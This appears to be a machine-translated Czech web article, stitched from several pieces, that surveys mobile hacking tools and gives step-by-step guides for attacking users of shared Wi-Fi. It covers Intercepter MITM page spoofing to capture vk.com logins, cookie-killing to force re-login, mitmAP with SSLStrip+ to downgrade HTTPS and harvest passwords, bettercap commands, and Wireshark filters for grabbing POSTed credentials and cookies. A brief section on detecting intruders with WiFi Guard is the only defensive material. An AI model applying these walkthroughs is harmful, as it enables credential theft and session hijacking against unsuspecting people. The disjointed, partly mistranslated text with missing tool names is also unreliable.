Zachycujeme hesla a soubory cookie. Experiment: jak ukrást osobní údaje pomocí bezplatné Wi-Fi Jak zachytit data přes wifi Android

💖 Líbí se vám? Sdílejte odkaz se svými přáteli

„Smartphone s hackerskými nástroji? Nic takového neexistuje,“ řekli bychom vám nedávno. Některé z obvyklých nástrojů pro realizaci útoků bylo možné spustit pouze na některá Maemo. Nyní bylo mnoho známých nástrojů přeneseno na iOS a Android a některé hackovací nástroje byly speciálně napsány pro mobilní prostředí. Může smartphone nahradit notebook v penetračních testech? Rozhodli jsme se to prověřit.

Android

Android je oblíbená platforma nejen pro pouhé smrtelníky, ale i pro ty správné lidi. Počet užitečných ][-utilit je zde jednoduše mimo tabulky. Za to můžeme poděkovat UNIXovým kořenům systému – to výrazně zjednodušilo portování mnoha nástrojů na Android. Bohužel Google některé z nich do Obchodu Play nepovoluje, takže budete muset příslušný APK nainstalovat ručně. Některé nástroje také vyžadují maximální přístup k systému (například firewall iptables), takže byste se měli předem postarat o přístup root. Každý výrobce zde používá svou vlastní technologii, ale najít potřebný návod je celkem snadné. Zdroj LifeHacker (bit.ly/eWgDlu) dal dohromady dobrou sadu HOWTO. Pokud jste zde však nenašli konkrétní model, vždy přijde na pomoc fórum XDA-Developers (www.xda-developers.com), kde najdete různé informace prakticky o jakémkoli modelu telefonu Android. Tak či onak, některé z níže popsaných nástrojů budou fungovat bez přístupu root.

Začněme recenzi neobvyklým správcem balíčků. Vývojáři tomu říkají „utility pro superuživatele“ a není to daleko od pravdy. Po instalaci BotBrew získáte úložiště, odkud si můžete stáhnout obrovské množství známých nástrojů zkompilovaných pro Android. Mezi nimi: Python a Ruby interpreti pro spouštění mnoha nástrojů, které jsou v nich napsány, sniffer tcpdump a skener Nmap pro analýzu sítě, Git a Subversion pro práci se systémy správy verzí a mnoho dalšího.

Síťové skenery

Nenápadný smartphone, který se na rozdíl od notebooku snadno vejde do kapsy a nikdy nevzbudí podezření, se může hodit pro průzkum sítě. Již jsme si řekli výše, jak můžete nainstalovat Nmap, ale existuje ještě jedna možnost. PIPS je port skeneru Nmap speciálně přizpůsobený pro Android, i když neoficiální. To znamená, že můžete rychle najít aktivní zařízení v síti, určit jejich OS pomocí možností otisků prstů, provést skenování portů - zkrátka udělat vše, co Nmap umí.

S používáním Nmapu jsou přes veškerou jeho sílu dva problémy. Za prvé, parametry pro skenování se přenášejí pomocí spouštěcích kláves, které musíte nejen znát, ale také je umět zadávat pomocí nepohodlné mobilní klávesnice. A za druhé, výsledky skenování ve výstupu konzole nejsou tak jasné, jak bychom chtěli. Skener Fing tyto nedostatky nemá, velmi rychle prohledá síť, provede otisky prstů a následně v přehledné podobě zobrazí seznam všech dostupných zařízení s rozdělením podle typu (router, desktop, iPhone a podobně). Zároveň u každého hostitele můžete rychle zobrazit seznam otevřených portů. Navíc přímo odtud se můžete připojit řekněme k FTP pomocí FTP klienta nainstalovaného v systému - velmi pohodlné.

Pokud jde o analýzu konkrétního hostitele, může být nepostradatelný nástroj NetAudit. Funguje na jakémkoli zařízení Android (i nerootovaném) a umožňuje nejen rychle identifikovat zařízení v síti, ale také je prozkoumat pomocí velké databáze otisků prstů k určení operačního systému a také CMS systémů používaných na webu. server. V databázi je nyní více než 3000 digitálních otisků prstů.

Pokud naopak potřebujete pracovat na nižší úrovni a pečlivě prozkoumat chod sítě, pak se bez Net Tools neobejdete. Jedná se o nepostradatelnou sadu nástrojů pro práci správce systému, která vám umožní plně diagnostikovat provoz sítě, ke které je zařízení připojeno. Balíček obsahuje více než 15 různých typů programů, jako je ping, traceroute, arp, dns, netstat, route.

Manipulace s dopravou

Sniffer založený na tcpdump poctivě zaznamenává všechna data do souboru pcap, který pak lze studovat pomocí známých nástrojů, jako je Wireshark nebo Network Miner. Protože v něm nejsou implementovány žádné schopnosti pro útoky MITM, jedná se spíše o nástroj pro analýzu vašeho provozu. Je to například skvělý způsob, jak studovat, co programy nainstalované na vašem zařízení z pochybných úložišť přenášejí.

Pokud mluvíme o bojových aplikacích pro Android, pak jednou z nejsenzačnějších je FaceNiff, která implementuje odposlech a vstřikování do zachycených webových relací. Stažením balíčku APK s programem můžete tento hackerský nástroj spustit na téměř jakémkoli smartphonu Android a připojením k bezdrátové síti zachytit účty různých služeb: Facebook, Twitter, VKontakte atd. - více než deset celkem. Únos relace se provádí pomocí útoku ARP spoofing, ale útok je možný pouze na nechráněná připojení (FaceNiff se nemůže vklínit do provozu SSL). Aby autor omezil tok scriptdis, omezil maximální počet relací na tři - poté musíte kontaktovat vývojáře pro speciální aktivační kód.

Pokud chce tvůrce FaceNiffu peníze za jeho používání, pak je DroidSheep zcela bezplatný nástroj se stejnou funkčností. Je pravda, že distribuční sadu nenajdete na oficiálních stránkách (je to kvůli tvrdým německým zákonům týkajícím se bezpečnostních utilit), ale lze ji bez problémů najít na internetu. Hlavním úkolem nástroje je zachytit uživatelské webové relace populárních sociálních sítí, implementované pomocí stejného ARP Spoofing. Ale je tu problém se zabezpečeným připojením: stejně jako FaceNiff DroidSheep rozhodně odmítá pracovat s protokolem HTTPS.

Tato utilita také demonstruje nejistotu otevřených bezdrátových sítí, ale na trochu jiné úrovni. Nezachycuje uživatelské relace, ale umožňuje, aby HTTP provoz procházel skrz sebe pomocí spoofingového útoku a prováděl s ním zadané manipulace. Počínaje obyčejnými žertíky (nahrazení všech obrázků na webu trollfaces, převrácení všech obrázků nebo, řekněme, nahrazení výsledků Google) a konče phishingovými útoky, kdy uživatel dostane falešné stránky tak populárních služeb, jako je facebook.com, linkedin .com, vkontakte.ru a mnoho dalších.

Pokud se ptáte, která hackovací utilita pro Android je nejvýkonnější, pak Anti pravděpodobně nemá konkurenci. Toto je skutečný hackerský kombajn. Hlavním úkolem programu je skenování perimetru sítě. Dále do bitvy vstupují různé moduly, s jejichž pomocí je implementován celý arzenál: odposlouchávání provozu, provádění MITM útoků a využívání nalezených zranitelností. Pravda, existují i ​​nevýhody. První věc, která vás upoutá, je, že zneužívání zranitelností se provádí pouze z centrálního programového serveru, který je umístěn na internetu, v důsledku čehož můžete zapomenout na cíle, které nemají externí IP adresu.

Dopravní tunelování

Známý správce souborů je nyní na chytrých telefonech! Stejně jako ve verzi pro stolní počítače existuje systém pluginů pro připojení k různým síťovým adresářům a také kanonický dvoupanelový režim - zvláště vhodný na tabletech.

Dobře, ale jak můžete zajistit bezpečnost vašich dat přenášených prostřednictvím otevřené bezdrátové sítě? Kromě VPN, kterou Android podporuje ihned po vybalení, můžete vytvořit tunel SSH. K tomuto účelu existuje skvělá utilita SSH Tunnel, která umožňuje směrovat provoz vybraných aplikací nebo celého systému jako celku přes vzdálený SSH server.

Často je nutné posílat provoz přes proxy nebo SOX a v tomto případě pomůže ProxyDroid. Je to jednoduché: vyberete si, který provoz aplikací chcete tunelovat, a určíte proxy (podporovány jsou HTTP/HTTPS/SOCKS4/SOCKS5). Pokud je vyžadována autorizace, ProxyDroid to také podporuje. Mimochodem, konfiguraci lze propojit s konkrétní bezdrátovou sítí provedením různých nastavení pro každou z nich.

Bezdrátová síť

Vestavěný správce bezdrátové sítě není příliš informativní. Pokud potřebujete rychle získat úplný obrázek o blízkých přístupových bodech, pak je nástroj Wifi Analyzer vynikající volbou. Ukáže nejen všechny blízké přístupové body, ale také zobrazí kanál, na kterém fungují, jejich MAC adresu a hlavně typ použitého šifrování (po shlédnutí kýžených písmen „WEP“ můžeme předpokládat, že přístup k je zajištěna zabezpečená síť). Utilita je navíc ideální, pokud potřebujete najít, kde se požadovaný přístupový bod fyzicky nachází, díky vizuálnímu indikátoru síly signálu.

Tato utilita, jak uvádí její vývojář, může být užitečná, když je kapacita bezdrátové sítě naplněna klienty, kteří využívají celý kanál, a právě v tuto chvíli je potřeba dobré připojení a stabilní připojení. WiFiKill umožňuje odpojovat klienty od internetu buď selektivně, nebo na základě konkrétního kritéria (např. je možné si dělat legraci ze všech členů Yabloko). Program jednoduše provede útok ARP spoofing a přesměruje všechny klienty na sebe. Tento algoritmus je hloupě jednoduše implementován na základě iptables. Toto je ovládací panel pro bezdrátové sítě rychlého občerstvení :).

Audit webových aplikací

Manipulace s HTTP požadavky z počítače je hračka, existuje na to obrovské množství utilit a pluginů do prohlížečů. V případě smartphonu je vše trochu složitější. HTTP Query Builder vám pomůže odeslat vlastní HTTP požadavek s parametry, které potřebujete, například požadovaný soubor cookie nebo změněný User-Agent. Výsledek požadavku se zobrazí ve standardním prohlížeči.

Pokud je web chráněn heslem pomocí základního ověřování přístupu, můžete jeho spolehlivost zkontrolovat pomocí nástroje Router Brute Force ADS 2 Původně byl tento nástroj vytvořen pro hrubou sílu hesel na panelu správce routeru, ale je jasné, že to může být. použito proti jakémukoli jinému zdroji s podobnou ochranou. Nástroj funguje, ale je jasně hrubý. Vývojář například neposkytuje hrubou sílu, ale pouze hrubou sílu pomocí slovníku.

Určitě jste už slyšeli o tak senzačním programu pro deaktivaci webových serverů, jako je Slowloris. Principem jeho fungování je vytvoření a udržení maximálního počtu spojení se vzdáleným webovým serverem, čímž se zabrání připojení nových klientů k němu. AnDOSid je tedy analogem Slowloris přímo ve vašem zařízení Android! Prozradím vám tajemství, dvě stě připojení stačí k zajištění nestabilního provozu každého čtvrtého webu, na kterém běží webový server Apache. A to vše – z vašeho telefonu!

Různé inženýrské sítě

Při práci s mnoha webovými aplikacemi a analýze jejich logiky se zcela běžně setkáváme s daty přenášenými v zakódované podobě, konkrétně Base64. Encode vám pomůže tato data dekódovat a uvidíte, co přesně je v nich uloženo. Možná tím, že nahradíte uvozovky, zakódujete je zpět do Base64 a nahradíte je v adrese URL webu, který zkoumáte, dostanete kýženou chybu databázového dotazu.

Pokud potřebujete hexadecimální editor, pak je tu jeden i pro Android. S HexEditorem můžete upravovat jakékoli soubory, včetně systémových souborů, pokud povýšíte práva programu na superuživatele. Vynikající náhrada za standardní textový editor, která vám umožní snadno najít požadovaný text a změnit jej.

Vzdálený přístup

Jakmile budete mít přístup ke vzdálenému hostiteli, musíte jej umět používat. A k tomu potřebujeme klienty. Začněme SSH, kde je ConnectBot již de facto standardem. Kromě pohodlného rozhraní poskytuje možnost organizovat zabezpečené tunely prostřednictvím připojení SSH.

Užitečný program, který umožňuje připojení ke vzdálené ploše prostřednictvím služeb RDP nebo VNC. Jsem velmi rád, že se jedná o dva klienty v jednom, není potřeba používat různé nástroje pro RDP a VNC.

Prohlížeč MIB speciálně napsaný pro Android, pomocí kterého můžete spravovat síťová zařízení pomocí protokolu SNMP. Může být užitečné pro vývoj útočného vektoru na různých routerech, protože dosud nebyl zrušen standardní komunitní řetězec (jinými slovy přístupové heslo) pro správu přes SNMP.

iOS

Platforma iOS je mezi vývojáři bezpečnostních utilit neméně oblíbená. Pokud ale v případě Androidu byla práva root potřeba pouze pro některé aplikace, pak na zařízeních Apple je jailbreak vyžadován téměř vždy. Naštěstí i pro nejnovější firmware iDevices (5.1.1) již existuje nástroj pro útěk z vězení. Spolu s plným přístupem získáte také alternativního správce aplikací Cydia, který již obsahuje mnoho utilit.

Práce se systémem

První věcí, kterou chci začít, je instalace terminálu. Z pochopitelných důvodů není součástí standardní dodávky mobilního OS, ale budeme jej potřebovat ke spuštění konzolových utilit, o kterých se budeme dále bavit. Nejlepší implementací emulátoru terminálu je MobileTerminal - podporuje více terminálů najednou, gesta pro ovládání (například pro odesílání Control-C) a celkově zaujme svou promyšleností.

Další, složitější možností, jak získat přístup ke konzoli zařízení, je nainstalovat na ni OpenSSH (to se provádí přes Cydii) a připojit se k ní lokálně přes SSH klienta. Pokud používáte správného klienta, jako je iSSH, který má úžasné ovládání pomocí dotykové obrazovky, pak je tato metoda ještě pohodlnější než použití MobileTerminal.

Zachycování dat

Nyní, když máte přístup ke konzole, můžete vyzkoušet nástroje. Začněme Pirni, která se do historie zapsala jako plnohodnotný sniffer pro iOS. Konstrukčně omezený Wi-Fi modul zabudovaný v zařízení bohužel nelze přepnout do promiskuitního režimu nutného pro běžný odposlech dat. K zachycení dat se tedy používá klasický ARP spoofing, s jehož pomocí prochází veškerý provoz přes samotné zařízení. Standardní verze utility se spouští z konzole, kde se kromě parametrů útoku MITM uvádí i název souboru PCAP, do kterého se loguje veškerý provoz. Utilita má pokročilejší verzi - Pirni Pro, která se může pochlubit grafickým rozhraním. Navíc dokáže za běhu analyzovat HTTP provoz a dokonce z něj automaticky extrahovat zajímavá data (například přihlašovací jména a hesla) pomocí regulárních výrazů, které jsou specifikovány v nastavení.

Známý sniffer Intercepter-NG, o kterém jsme psali vícekrát, se nedávno dočkal konzolové verze. Jak autor říká, většina kódu je napsána v čistém ANSI C, které se chová stejně téměř v každém prostředí, takže konzolová verze fungovala od samého začátku jak na desktopových Windows, Linux a BSD, tak na mobilních platformách včetně iOS a Android. Konzolová verze již implementuje získávání hesel přenášených přes různé protokoly, zachycování zpráv instant messenger (ICQ/Jabber a mnoho dalších) a také obnovu souborů z provozu (HTTP/FTP/IMAP/POP3/SMTP/SMB). Zároveň jsou k dispozici funkce síťového skenování a kvalitní ARP Poison. Pro správnou funkci musíte nejprve nainstalovat balíček libpcap přes Cydii (nezapomeňte povolit vývojové balíčky v nastavení). Všechny pokyny ke spuštění se scvrkají na nastavení správných práv: chmod +x intercepter_ios. Dále, pokud spustíte sniffer bez parametrů, objeví se přehledné interaktivní rozhraní Itercepter, které vám umožní spouštět jakékoli útoky.

Je těžké tomu uvěřit, ale tento sofistikovaný nástroj pro implementaci útoků MITM byl nakonec portován na iOS. Po obrovském množství práce se podařilo udělat plnohodnotný mobilní port. Abyste se uchránili před tancem s tamburínou kolem závislostí během vlastní kompilace, je lepší nainstalovat již vytvořený balíček pomocí Cydie po přidání theworm.altervista.org/cydia (úložiště TWRepo) jako zdroje dat. Sada také obsahuje obslužný program etterlog, který pomáhá extrahovat různé typy užitečných informací ze shromážděného výpisu provozu (například přístupové účty FTP).

Analýza bezdrátové sítě

Ve starších verzích iOS se řemeslníkům spustil aircrack a mohli zlomit klíč WEP, ale zkontrolovali jsme: program nefunguje na nových zařízeních. Pro studium Wi-Fi se proto budeme muset spokojit pouze s Wi-Fi skenery. WiFi Analyzer analyzuje a zobrazuje informace o všech dostupných sítích 802.11 kolem vás, včetně informací o SSID, kanálech, prodejcích, MAC adresách a typech šifrování. Nástroj vytváří vizuální grafy v reálném čase na základě dat přítomných ve vzduchu. S takovým programem je snadné najít fyzickou polohu bodu, pokud jej náhle zapomenete, a například se podívat na WPS PIN, což může být užitečné pro připojení.

Síťové skenery

Jaký program používá kterýkoli penetrační tester kdekoli na světě, bez ohledu na cíle a záměry? Síťový skener. A v případě iOS půjde s největší pravděpodobností o nejvýkonnější sadu nástrojů Scany. Díky sadě vestavěných utilit si rychle uděláte detailní obrázek o síťových zařízeních i například o otevřených portech. Kromě toho balíček obsahuje nástroje pro testování sítě, jako je ping, traceroute, nslookup.

Mnoho lidí však preferuje Fing. Skener má celkem jednoduchou a omezenou funkcionalitu, ale na první seznámení se sítí řekněme bufetu úplně stačí :). Výsledky zobrazují informace o dostupných službách na vzdálených počítačích, MAC adresy a názvy hostitelů připojených ke skenované síti.

Zdálo by se, že na Nikto zapomněli, ale proč? Koneckonců, tento webový skener zranitelnosti, napsaný ve skriptovacím jazyce (jmenovitě Perl), můžete snadno nainstalovat prostřednictvím Cydie. To znamená, že jej můžete snadno spustit na vašem jailbreaknutém zařízení z terminálu. Nikto vám rád poskytne další informace o testovaném webovém zdroji. Kromě toho můžete do její znalostní databáze přidat vlastní vyhledávací podpisy vlastníma rukama.

Tento výkonný nástroj pro automatické zneužívání zranitelností SQL je napsán v Pythonu, což znamená, že jakmile si interpret nainstalujete, můžete jej snadno používat přímo ze svého mobilního zařízení.

Dálkové ovládání

Mnoho síťových zařízení (včetně drahých routerů) je spravováno pomocí protokolu SNMP. Tento nástroj umožňuje skenovat podsítě pro dostupné služby SNMP s předem známými hodnotami komunitních řetězců (jinými slovy, standardními hesly). Všimněte si, že vyhledávání služeb SNMP pomocí standardních komunitních řetězců (veřejné/soukromé) ve snaze získat přístup ke správě zařízení je nedílnou součástí každého penetračního testu spolu s identifikací samotného perimetru a identifikací služeb.

Dva nástroje od stejného výrobce jsou navrženy pro připojení ke vzdálené ploše pomocí protokolů RDP a VNC. V App Store je mnoho podobných utilit, ale tyto jsou obzvláště snadno použitelné.

Obnova hesla

Legendární program, který pomáhá milionům hackerů po celém světě „zapamatovat si“ jejich heslo, byl přenesen na iOS. Nyní můžete přímo ze svého iPhone vyhledávat hesla pro služby jako HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 a mnoho dalších. Pravda, pro efektivnější útok je lepší zásobit se dobrými slovníky hrubé síly.

Každý ví z první ruky zranitelnost používání standardních hesel. Pass Mule je druh adresáře, který obsahuje všechny druhy standardních přihlašovacích údajů a hesel pro síťová zařízení. Jsou pohodlně uspořádány podle názvu dodavatele, produktu a modelu, takže najít ten, který potřebujete, nebude obtížné. Program je spíše navržen tak, aby ušetřil čas hledáním manuálu k routeru, standardní login a heslo, které je potřeba zjistit.

Zneužívání zranitelností

Je těžké si představit více hackerský nástroj než Metasploit, a to je to, co uzavírá naši dnešní recenzi. Metasploit je balík různých nástrojů, jejichž hlavním úkolem je zneužít zranitelnosti v softwaru. Představte si: asi 1000 spolehlivých, osvědčených a nezbytných exploitů v každodenním životě pentesteru - přímo na vašem smartphonu! S pomocí takového nástroje se můžete prosadit opravdu v jakékoli síti. Metasploit vám nejen umožňuje využívat chyby v serverových aplikacích – jsou k dispozici také nástroje pro útok na klientské aplikace (například prostřednictvím modulu Browser Autopwn, když je do klientského provozu vložen bojový náklad). Zde je třeba říci, že neexistuje žádná mobilní verze sady nástrojů, nicméně standardní balíček můžete nainstalovat na zařízení Apple pomocí .

Interceptor je multifunkční síťový nástroj, který umožňuje získávat data z provozu (hesla, instant messenger zprávy, korespondence atd.) a realizovat různé MiTM útoky.

Rozhraní programu Intercepter
Hlavní funkčnost

  • Zachycování zpráv instant messengeru.
  • Zachycování cookies a hesel.
  • Zachycování aktivity (stránky, soubory, data).
  • Schopnost podvrhnout stahování souborů přidáním škodlivých souborů. Lze použít ve spojení s jinými utilitami.
  • Nahrazení Https certifikátů Http.
Provozní režimy
Režim Messenger– umožňuje kontrolovat korespondenci, která byla odeslána v nezašifrované podobě. Byl používán k zachycení zpráv v takových instant messengerech, jako jsou zprávy ICQ, AIM, JABBER.

Režim oživení– obnova užitečných dat z provozu, z protokolů, které přenášejí provoz v čistém textu. Když si oběť prohlíží soubory, stránky nebo data, mohou být částečně nebo úplně zachyceny. Navíc můžete určit velikost souborů, aby se program nestahoval po malých částech. Tyto informace lze použít pro analýzu.

Režim hesla– režim pro práci s cookies. Tímto způsobem je možné získat přístup k navštíveným souborům oběti.

Režim skenování– hlavní režim pro testování. Chcete-li zahájit skenování, musíte kliknout pravým tlačítkem na Smart Scan. Po skenování se v okně zobrazí všichni účastníci sítě, jejich operační systém a další parametry.

Navíc v tomto režimu můžete skenovat porty. Musíte použít funkci Scan Ports. K tomu samozřejmě existuje mnohem více funkčních nástrojů, ale přítomnost této funkce je důležitým bodem.

Pokud máme zájem o cílený útok na síť, tak po skenování je potřeba přidat cílovou IP k Nat pomocí příkazu (Add to Nat). V jiném okně bude možné provádět další útoky.

Režim Nat. Hlavní režim, který umožňuje provádět řadu útoků přes ARP. Toto je hlavní okno, které umožňuje cílené útoky.

režim DHCP. Toto je režim, který vám umožňuje zvýšit váš DHCP server, aby implementoval DHCP útoky uprostřed.

Některé typy útoků, které lze provést
Spoofing stránek

Chcete-li podvrhnout webovou stránku oběti, musíte přejít na Target, poté musíte zadat web a jeho náhradu. Tímto způsobem můžete nahradit poměrně hodně stránek. Vše závisí na tom, jak kvalitní je padělek.

Spoofing stránek

Příklad pro VK.com

Výběr útoku MiTM

Změna pravidla vstřikování
Výsledkem je, že oběť při žádosti o vk.com otevře falešnou webovou stránku. A v režimu hesla by mělo být přihlašovací jméno a heslo oběti:

Chcete-li provést cílený útok, musíte vybrat oběť ze seznamu a přidat ji do cíle. To lze provést pomocí pravého tlačítka myši.

Přidání útoků MiTm
Nyní můžete použít Ressurection Mode k obnovení různých dat z provozu.

Soubory obětí a informace prostřednictvím útoku MiTm
Dopravní spoofing

Zadání nastavení
Poté se žádost oběti změní z „důvěry“ na „ztráta“.

Kromě toho můžete zabít soubory cookie, aby se oběť odhlásila ze všech účtů a znovu se přihlásila. To vám umožní zachytit přihlašovací jména a hesla.

Ničení cookies

Jak vidět potenciálního sniffera v síti pomocí Intercepteru?

Pomocí možnosti Promisc Detection můžete detekovat zařízení, které skenuje v místní síti. Po skenování se ve sloupci stavu zobrazí „Sniffer“. Toto je první způsob, jak detekovat skenování v místní síti.

Detekce snifferu
Zařízení SDR HackRF


HackRF
SDR je druh rádiového přijímače, který umožňuje pracovat s různými radiofrekvenčními parametry. Je tak možné zachytit signál Wi-Fi, GSM, LTE atd.

HackRF je plnohodnotné zařízení SDR za 300 $. Autor projektu Michael Ossman v tomto směru vyvíjí úspěšná zařízení. Sniffer Ubertooth Bluetooth byl již dříve vyvinut a úspěšně implementován. HackRF je úspěšný projekt, který na Kickstarteru vybral více než 600 tisíc. 500 takových zařízení již bylo prodáno k beta testování.

HackRF pracuje ve frekvenčním rozsahu od 30 MHz do 6 GHz. Vzorkovací frekvence je 20 MHz, což umožňuje zachytit signály z Wi-FI a LTE sítí.

Jak se chránit na místní úrovni?

Nejprve použijeme software SoftPerfect WiFi Guard. Existuje přenosná verze, která nezabere více než 4 MB. Umožňuje vám prohledat vaši síť a zobrazit, jaká zařízení jsou na ní zobrazena. Má nastavení, které vám umožní vybrat síťovou kartu a maximální počet skenovaných zařízení. Navíc můžete nastavit interval skenování.


Rozhraní programu SoftPerfect WiFi Guard
Po skenování program odešle upozornění o počtu neznámých zařízení. To nám umožňuje přidávat a označovat důvěryhodné uživatele a všímat si, zda se někdo připojil a začne naslouchat provozu. Upozornění budou odeslána po každém intervalu skenování. To vám umožní zakázat konkrétního podvodníka na routeru, pokud dojde k podezřelé činnosti.


Nastavení programu SoftPerfect WiFi Guard


Možnost přidávat komentáře pro uživatele


Okno upozornění pro neznámá zařízení po každém zadaném intervalu skenování

Závěr
Zkoumali jsme tedy v praxi, jak používat software k zachycení dat v síti. Podívali jsme se na několik konkrétních útoků, které umožňují získat přihlašovací údaje a další informace. Kromě toho jsme se podívali na SoftPerfect WiFi Guard, který vám umožňuje chránit vaši místní síť před odposloucháváním provozu na primitivní úrovni.

A spouští je automaticky, díky čemuž je dosaženo bypassu HTTPS / HSTS. S mitmAP nemusíte do tohoto procesu jít, ale pokud chcete udělat něco podobného, ​​například s create_ap, pak se podívejte na "Pokyny pro použití SSLStrip+ a dns2proxy k obejití HSTS".

mitmAP vám umožňuje používat nejúčinnější metody pro downgrade HTTPS na HTTP prakticky bez zadávání příkazů (a bez pochopení mechanismu obcházení HTTPS). V mých testech bylo heslo přeneseno v čistém textu pro vk.com, yandex.ru, mail.ru.

Tento skript je vytvořen ve dvou verzích - pro práci v Kali Linuxu nebo v Raspberry PI.

Skript by měl fungovat na derivátech Debianu, pokud nainstalujete závislosti; ale nebude fungovat například v Arch Linux / BlackArch kvůli metodě, kterou autor zvolil pro spouštění služeb.

Pokyny pro použití mitmAP

Stáhněte si skript:

Git klon https://github.com/xdavidhu/mitmAP.git cd mitmAP/

Spusť to:

Sudo python3 mitmAP.py

Skript začne otázkou:

[?] Instalovat/aktualizovat závislosti? A/N:

Překlad: instalace/aktualizace závislostí?

Pokud spouštíte poprvé, tak souhlaste, tzn. stiskněte Enter. V budoucnu si můžete vybrat n(Ne).

Další otázka:

[?] Zadejte prosím název vašeho bezdrátového rozhraní (pro AP):

Překlad: Zadejte název vašeho bezdrátového rozhraní (pro AP). Pokud neznáte název svých rozhraní, spusťte v jiném okně příkaz:

Zobrazí všechna síťová rozhraní ve vašem systému. A tým

Sudo iw dev

zobrazí pouze rozhraní bezdrátové sítě.

V Kali Linuxu se obvykle nazývá bezdrátové rozhraní wlan0(a pokud jsou dva, tak ten druhý má jméno wlan1).

[?] Zadejte prosím název rozhraní připojeného k internetu:

Překlad: Zadejte prosím název rozhraní připojeného k internetu.

V Kali Linuxu se obvykle nazývá kabelové rozhraní eth0. Pro připojení k internetu můžete použít i druhou Wi-Fi kartu.

[?] Používat SSLSTRIP 2.0? A/N:

Překlad: Skript se zeptá, zda použít SSLStrip+ . V dnešní době, kdy je významná, ne-li většina, část provozu přenášena přes HTTPS (šifrovaně), je tato možnost vysoce doporučena.

[?] Vytvořte nový konfigurační soubor HOSTAPD na "/etc/hostapd/hostapd.conf" A/n:

Překlad: Mám vytvořit nový konfigurační soubor hostapd.

Pokud to spouštíte poprvé, musíte to udělat. Pokud během následujících spouštění nebudete měnit nastavení přístupového bodu, můžete vybrat n(tj. „ne“).

Nastavení AP:

[?] Zadejte SSID pro AP:

Překlad: Zadejte název AP.

[?] Zadejte prosím kanál pro AP:

Překlad: Zadejte číslo kanálu AP.

[?] Povolit šifrování WPA2? ano/ne:

Překlad: Mám povolit šifrování WPA2?

Pokud povolíte šifrování, budete muset pro připojení k přístupovému bodu zadat heslo. Pro naše účely volíme „ne“.

Poslední nastavení AP:

[?] Nastavit rychlostní limit pro klienty? A/N:

Překlad: Mám klientům nastavit rychlostní limit?

volím ne

[?] Spustit WIRESHARK na wlan0? A/N:

analýza dat mitmAP

mitmAP zobrazuje zachycená data, včetně přihlašovacích údajů a hesel, ve svém hlavním okně:

Ve své složce vytvoří adresář protokoly se dvěma soubory: mitmap-sslstrip.log A mitmap-wireshark.pcap. První soubor obsahuje shromážděná data v textové podobě. A druhý je určen k analýze v programu Wireshark.

Upozornění: po restartování programu budou tyto soubory přepsány! Tito. pokud máte v úmyslu tyto soubory analyzovat později, musíte se postarat o jejich přesunutí nebo přejmenování, jinak budou jednoduše odstraněny.

Pokud se rozhodnete spustit okno Wireshark a zobrazit přenášené obrázky pomocí Driftnet, můžete je také použít ke sledování přenášených dat v reálném čase.

Analýza dat ve Wiresharku

Wireshark má velmi podrobný filtr dat, jeho rozmanitost můžete vidět na oficiální stránce dokumentace

Uvedu příklady několika běžících filtrů.

Chcete-li zobrazit všechny požadavky HTTP odeslané pomocí metody POST v aplikaci Wireshark:

Http.request.method == "POST"

Chcete-li zobrazit data odeslaná nebo přijatá z konkrétní domény (místo zadejte doménu zájmu, například vk.com):

HTTP.host==" "

Pro vyhledání řetězce v celém proudu přenášených dat se používá následující filtr (namísto<строка>zadejte řetězec, který chcete hledat):

Rám obsahuje "<строка>"

Chcete-li zobrazit soubory cookie ve službě Wireshark:

HTTP.cookie

Pokud máte zájem o soubory cookie s konkrétním názvem, použijte:

Http.cookie obsahuje "<имя_куки>"

Chcete-li zobrazit požadavky ve Wiresharku odeslané pomocí metody GET nebo POST:

Http.request.uri obsahuje "?" nebo http.request.method=="POST"

Pokud chcete najít výměnná data se serverem FTP, můžete ve Wiresharku použít jeden z následujících filtrů:

Tcp.port==21 || tcp.port==20

Snímání dat v jiných programech

Přestože mitmAP používá zajímavé programy, vždy můžete provádět analýzu dat pomocí jiných nástrojů. Pokud například chcete používat Bettercap, musíte zvážit, že:

  • Spoofing ARP není potřeba
  • Není třeba zjišťovat klienty
  • Není potřeba povolit SSLStrip.

Tito. příkaz může vypadat takto:

Sudo bettercap -X -I wlan0 -S NONE --no-discovery

Sudo bettercap -X -I wlan0 -S NONE --no-discovery --proxy --no-sslstrip

Vypínání mitmAP

Chcete-li program vypnout, musíte dvakrát rychle stisknout CTRL+C. Připomínám, že když program znovu spustíte, přepíše soubory přijatými daty. Tito. Pokud je chcete později analyzovat, musíte je přesunout do jiné složky.

Co je to cookie?

Existuje mechanismus, který umožňuje http serveru uložit některé textové informace do počítače uživatele a poté k nim přistupovat. Tato informace se nazývá cookie. Každý soubor cookie je v podstatě pár: název parametru a jeho hodnota. Každému cookie je také přiřazena doména, ke které patří. Z bezpečnostních důvodů má http server ve všech prohlížečích povolen pouze přístup k cookie své domény. Soubory cookie mohou mít navíc datum vypršení platnosti, v takovém případě budou uloženy v počítači do tohoto data, i když zavřete všechna okna prohlížeče.


Proč jsou soubory cookie důležité?

Všechny systémy pro více uživatelů používají soubory cookie k identifikaci uživatele. Přesněji řečeno, aktuální připojení uživatele ke službě, uživatelská relace. Pokud někdo pozná vaše cookies, bude se moci přihlásit do systému vaším jménem. Protože v současné době velmi málo internetových zdrojů kontroluje změny IP adresy během jedné uživatelské relace.


Jak změnit nebo nahradit soubory cookie?

Vývojáři prohlížečů neposkytují vestavěné nástroje pro úpravu souborů cookie. Ale vystačíte si s běžným poznámkovým blokem.


Krok 1: vytvořte textový soubor s textem

Editor registru systému Windows verze 5.00



@="C:\\IE_ext.htm"

Uložte jej pod názvem IE_ext.reg

Krok 2: Pomocí vytvořeného souboru přidejte změny do registru Windows.

Krok 3: vytvořte textový soubor s textem

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(externí.menuArgumenty.dokument.cookie);


Uložte jej pod názvem C:\IE_ext.htm

Krok 4: Přejdeme na webovou stránku, která nás zajímá.

Krok 5: Klepněte pravým tlačítkem myši na prázdné místo na stránce a vyberte položku nabídky "Práce s cookies". Povolit přístup do schránky. Vaše soubory cookie z tohoto webu přejdou do schránky. Můžete vložit jejich poznámkový blok a podívat se.


